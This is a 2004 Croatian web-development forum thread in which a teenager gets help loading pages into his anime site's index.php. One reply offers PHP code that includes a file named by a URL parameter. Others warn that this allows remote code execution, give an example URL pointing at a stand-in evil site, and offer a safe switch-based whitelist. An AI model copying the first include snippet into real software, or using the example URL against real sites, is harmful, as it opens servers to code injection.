Forum FAQForum FAQSearchSearch MemberlistMemberlist Forum ignore listForum ignore list RegisterRegister ProfileProfile Log in to check your private messagesLog in to check your private messages Log inLog in
CroAnime

 
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    mi3dot.org Forum Index -> Web stranice
View previous topic :: View next topic  
Author Message
Blitz



Joined: 20 Sep 2004
Posts: 62

PostPosted: 20.09.2004 19:58    Post subject: CroAnime Add user to your forum ignore list Reply with quote

moja anime stranica
http://www.cro-anime.tk
na sajtu mi nešto ne radi dobro
pa bih zamolio da malo pojasnite
nisam uspio da se svi dijelovi sajta otvaraju u index.php sajtu
naime, napiše mi da je neki error
alli, ostalo je sve okej, tj, dizajn
a i forum je u radu
možete se registrirati na njega Rolling Eyes
Back to top
View user's profile Send private message
budha



Joined: 02 Mar 2004
Posts: 1377
Location: Osijek

PostPosted: 20.09.2004 20:09    Post subject: Re: CroAnime Add user to your forum ignore list Reply with quote

dbzanime wrote:

na sajtu mi nešto ne radi dobro
pa bih zamolio da malo pojasnite

iz
tvoj site wrote:
Warning: main(): Failed opening '' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/anime/public_html/index.php on line 146

ti se bas ne moze puno reci, osim da ti putanja fajla nije u redu (ili nemas fajl), i da se taj fajl ucitava u 146-om redu index.php-a...

_________________
I hate to advocate drugs, alcohol, violence, or insanity to anyone, but they've always worked for me.
Back to top
View user's profile Send private message Visit poster's website
Blitz



Joined: 20 Sep 2004
Posts: 62

PostPosted: 21.09.2004 19:21    Post subject: Re: CroAnime Add user to your forum ignore list Reply with quote

budha wrote:
dbzanime wrote:

na sajtu mi nešto ne radi dobro
pa bih zamolio da malo pojasnite

iz
tvoj site wrote:
Warning: main(): Failed opening '' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/anime/public_html/index.php on line 146

ti se bas ne moze puno reci, osim da ti putanja fajla nije u redu (ili nemas fajl), i da se taj fajl ucitava u 146-om redu index.php-a...


mogu malo pojasniti ono što znam, pa mi netko pomogne
ovako
imam datoteku index.php, i želim da se svi dijelovi sajta loadaju u njoj
pa sam upisao u glavnu tabelu taj include
linkove sam ovako pisao
index.php?page=imedatoteke (naravno, upisao sam imena datoteka)
zanima me sada, sve te datoteke su sa ekstenzijom .html, jel moram u taj link upisati i tu ekstenziju, ili?
znam da sam zakomplicirao sve to, ali nadam se da će netko moć pomoći
ipak sa tek početnik u tome (15 godina Smile )
Back to top
View user's profile Send private message
budha



Joined: 02 Mar 2004
Posts: 1377
Location: Osijek

PostPosted: 22.09.2004 13:51    Post subject: Add user to your forum ignore list Reply with quote

ako sam te dobro shvatio, trebas nesto ovako:
Code:
<?php
if ($page!=='')
   {
   include("$page");
   }
else
   {
   include("pocetna.htm");
   }
?>

i u tom slucaju ti ostale datoteke trebaju imati extenziju.html

_________________
I hate to advocate drugs, alcohol, violence, or insanity to anyone, but they've always worked for me.
Back to top
View user's profile Send private message Visit poster's website
Blitz



Joined: 20 Sep 2004
Posts: 62

PostPosted: 22.09.2004 18:23    Post subject: Add user to your forum ignore list Reply with quote

budha wrote:
ako sam te dobro shvatio, trebas nesto ovako:
Code:
<?php
if ($page!=='')
   {
   include("$page");
   }
else
   {
   include("pocetna.htm");
   }
?>

i u tom slucaju ti ostale datoteke trebaju imati extenziju.html


hvala ti čovječe Wink
Back to top
View user's profile Send private message
silence



Joined: 24 Apr 2004
Posts: 890
Location: .....ni na nebu, ni na zemlji.....

PostPosted: 23.09.2004 07:14    Post subject: Add user to your forum ignore list Reply with quote

huh, bilo je nekoliko topica o sigurnosti includiranja u PHPu.
NIKAKO ne želiš napisati index.php?file=imedatoteke.html

i onda :
include ( $file);


to je BIG NO, NO kaj se tiče sigurnosti i time otvaraš mogućnost da ti bilo tko izvrši BILO KAKVU skriptu na serveru....

dovoljno je upisati URL index.php?file=http://www.neki_zli_site.com/zlo.php

i tvoja skrpita će to izvršiti na tvom webu.....
pročitaj malo topice, imaš nekoliko rasprava o ovome...

EDIT :: rasprave su u "server side" dijelu foruma

_________________
This End-User License is an agreement between Microsoft Corporation (hereafter referred to as "Microsoft") and you, the end-user (hereafter referred to as "our bitch").
Back to top
View user's profile Send private message Visit poster's website
budha



Joined: 02 Mar 2004
Posts: 1377
Location: Osijek

PostPosted: 23.09.2004 09:12    Post subject: Add user to your forum ignore list Reply with quote

istina, silence ima pravo... Embarassed

da ne moras trazit:
Code:
<?php
switch($page)
{
    case "kontakt":
        include ("kontakt.htm");
        break;
    case "onama":
        include ("onama.htm");
        break;
    case "nesto":
        include ("nesto.htm");
        break;
    default:
    include ("pocetna.htm");
}
?>

(ovo je napiso Phiber, al sam ti promjenio varijable prema tvojima, da se lakse snadjes..)

_________________
I hate to advocate drugs, alcohol, violence, or insanity to anyone, but they've always worked for me.
Back to top
View user's profile Send private message Visit poster's website
Blitz



Joined: 20 Sep 2004
Posts: 62

PostPosted: 26.09.2004 20:04    Post subject: Add user to your forum ignore list Reply with quote

upravo sam nabavio .com domenu
www.cro-anime.com

i, jedno pitanje još
ovaj posljednji kod sam iskoristio
ali, kako sada da linkove postavim
index.php?=imedatoteke kažete da ne valja
kako onda da to učinim?
Back to top
View user's profile Send private message
maratz
mi3.crew


Joined: 24 Nov 2003
Posts: 1207
Location: ZAG

PostPosted: 26.09.2004 20:15    Post subject: Add user to your forum ignore list Reply with quote

pa ovak:
Code:
index.php?page=onama

znači bez ekstenzije .html ili neke druge, a to se radi npr. switch petljom koja ti je gore upisana, jer ti inače može netko upisati npr:
Code:
index.php?page=neki_zao_kod.html
i shackati ti nedajbože site

_________________
STOP HITTING YOURSELF! | NETIQUETTE | TYPETESTER | Hypertext rulez™ | CREATIVE NIGHTS | ACCOMMODATIONS
Back to top
View user's profile Send private message Visit poster's website Twitter profile
Blitz



Joined: 20 Sep 2004
Posts: 62

PostPosted: 27.09.2004 16:20    Post subject: Add user to your forum ignore list Reply with quote

ja sve to lijepo učinim, ali, uvijek mi se prikazuje jedna te ista (ona koju sam stavio pod default)
ali, nikada ne prikaže one druge Confused
Back to top
View user's profile Send private message
Blitz



Joined: 20 Sep 2004
Posts: 62

PostPosted: 27.09.2004 17:13    Post subject: Add user to your forum ignore list Reply with quote

zanemarite moj posljednji post,jer sve sada radi
i thanks na pomoći Razz
Back to top
View user's profile Send private message
Blitz



Joined: 20 Sep 2004
Posts: 62

PostPosted: 07.10.2004 20:27    Post subject: Add user to your forum ignore list Reply with quote

sajt sam jako puno promjenio
na bolje (nadam se)
pa, ako vaš "stručni ocjenjivački tim" to može pogledat Confused Laughing

recite kaj mogu poboljšati, kritike, itd...
http://www.cro-anime.com

btw,odaberite layout ORANGE, jer WHITE ću najvjerojatnije odbaciti Wink
Back to top
View user's profile Send private message
maxy



Joined: 07 Sep 2003
Posts: 894
Location: Zagreb

PostPosted: 07.10.2004 21:57    Post subject: Add user to your forum ignore list Reply with quote

eh, ja imam sadrzajnu zamjerku.
prvo, layout je ok. gledao sam u IE-u i ajmo rec da moze proc. nista posebno ali nije lose po meni.

dalje, sadrzaj i semantika. imas gomilu gramatickih pogesaka koje bi imho trebao popraviti.
a sad glavna stvar - pa kud bas dragonball nadjes kao glavnu temu?
evo, ja sam pogledao sva 3 dragonballa i to je cisto sranje od serije. dbz je do polovice ok, ali od tuda pa do kraja GT-a je KOMA! bolje gledat santa barbaru.
ajd, predjem preko toga i gledam dalje - berserk - pa trebo si malo detaljnije opisati taj anime (koji je debelo nedovrsen).

naruto - zvuci kao da imas nindje koji tu rade nista Smile
Quote:
to naselje je bilo napadnuto od lisice demona

zar ne bi trebao napisati "lisica-demon je napao selo"?

sto je lose zapravo u svemu - procitao sam sto si napisao o evi i sto si napisao o ostalim animeima.
npr. o evi si otkrio neke vaznije detalje a o narutu i berserku nisi prakticki nista rekao.
to bi trebao popraviti, staviti detaljnije opise animea ali tako da NE otkrivas vazne stvari jer u suprotonom nije fora gledati.

btw. dragonball AF je hoax kojeg je pustila van jedna anime grupa iz zajebancije i nemrem vjerovat da si i ti popusio foru Smile


pohvaljujem popis i imenovanje epizoda, pohvaljujem sto ti se da to raditi ali moras sadrzaj obraditi bolje.
toliko od mene Smile
Back to top
View user's profile Send private message
Blitz



Joined: 20 Sep 2004
Posts: 62

PostPosted: 08.10.2004 18:45    Post subject: Add user to your forum ignore list Reply with quote

maxy wrote:
eh, ja imam sadrzajnu zamjerku.
prvo, layout je ok. gledao sam u IE-u i ajmo rec da moze proc. nista posebno ali nije lose po meni.

dalje, sadrzaj i semantika. imas gomilu gramatickih pogesaka koje bi imho trebao popraviti.
a sad glavna stvar - pa kud bas dragonball nadjes kao glavnu temu?
evo, ja sam pogledao sva 3 dragonballa i to je cisto sranje od serije. dbz je do polovice ok, ali od tuda pa do kraja GT-a je KOMA! bolje gledat santa barbaru.
ajd, predjem preko toga i gledam dalje - berserk - pa trebo si malo detaljnije opisati taj anime (koji je debelo nedovrsen).

naruto - zvuci kao da imas nindje koji tu rade nista Smile
Quote:
to naselje je bilo napadnuto od lisice demona

zar ne bi trebao napisati "lisica-demon je napao selo"?

sto je lose zapravo u svemu - procitao sam sto si napisao o evi i sto si napisao o ostalim animeima.
npr. o evi si otkrio neke vaznije detalje a o narutu i berserku nisi prakticki nista rekao.
to bi trebao popraviti, staviti detaljnije opise animea ali tako da NE otkrivas vazne stvari jer u suprotonom nije fora gledati.

btw. dragonball AF je hoax kojeg je pustila van jedna anime grupa iz zajebancije i nemrem vjerovat da si i ti popusio foru Smile


pohvaljujem popis i imenovanje epizoda, pohvaljujem sto ti se da to raditi ali moras sadrzaj obraditi bolje.
toliko od mene Smile


čuj, prihvaćam kritike, i pokušat ću sve to popravit
ali, u vezi DBAF, nisam ja to popušio
ja sam tu sekciju napravio, i u njoj ću opisati kaj bi se u njemu trebalo događati (kaj su fanovi izmislili)
žišku?
nisam ti ja od jučer da to nebi znao Rolling Eyes

a kaj se tiče gramatičkih grešaka, to sam u vrlo kratkome roku prevodio, tak da je ispalo kak je ispalo Embarassed
Back to top
View user's profile Send private message
maxy



Joined: 07 Sep 2003
Posts: 894
Location: Zagreb

PostPosted: 08.10.2004 19:53    Post subject: Add user to your forum ignore list Reply with quote

gle, u svakom animeu fanovi izmisljaju svakakve pizdarije i mislim da to fakat nije vrijedno spomena i stavljanja na stranicu. pogotovo glupost poput db AF Smile

ali dobro, ovo je samo moje misljenje. ziher sam da ima ekipe kojima je to super i sl. tako da to nije generalna kritika nego eto, samo jedna zamjerka bazirana na mom anime ukusu pa je opce ne trebas niti uvaziti Smile
Back to top
View user's profile Send private message
Blitz



Joined: 20 Sep 2004
Posts: 62

PostPosted: 09.10.2004 11:25    Post subject: Add user to your forum ignore list Reply with quote

maxy wrote:
gle, u svakom animeu fanovi izmisljaju svakakve pizdarije i mislim da to fakat nije vrijedno spomena i stavljanja na stranicu. pogotovo glupost poput db AF Smile

ali dobro, ovo je samo moje misljenje. ziher sam da ima ekipe kojima je to super i sl. tako da to nije generalna kritika nego eto, samo jedna zamjerka bazirana na mom anime ukusu pa je opce ne trebas niti uvaziti Smile


gle, niti se meni ne sviđa AF, naprotiv, glup mi je, jer su jednostavno "nadograđivali" SSJ levele Rolling Eyes (to su sigurno neki glupi fanovi bili) Confused
Back to top
View user's profile Send private message
Display posts from previous:   
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    mi3dot.org Forum Index -> Web stranice All times are GMT + 1 Hour
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Powered by phpBB © 2001, 2005 phpBB Group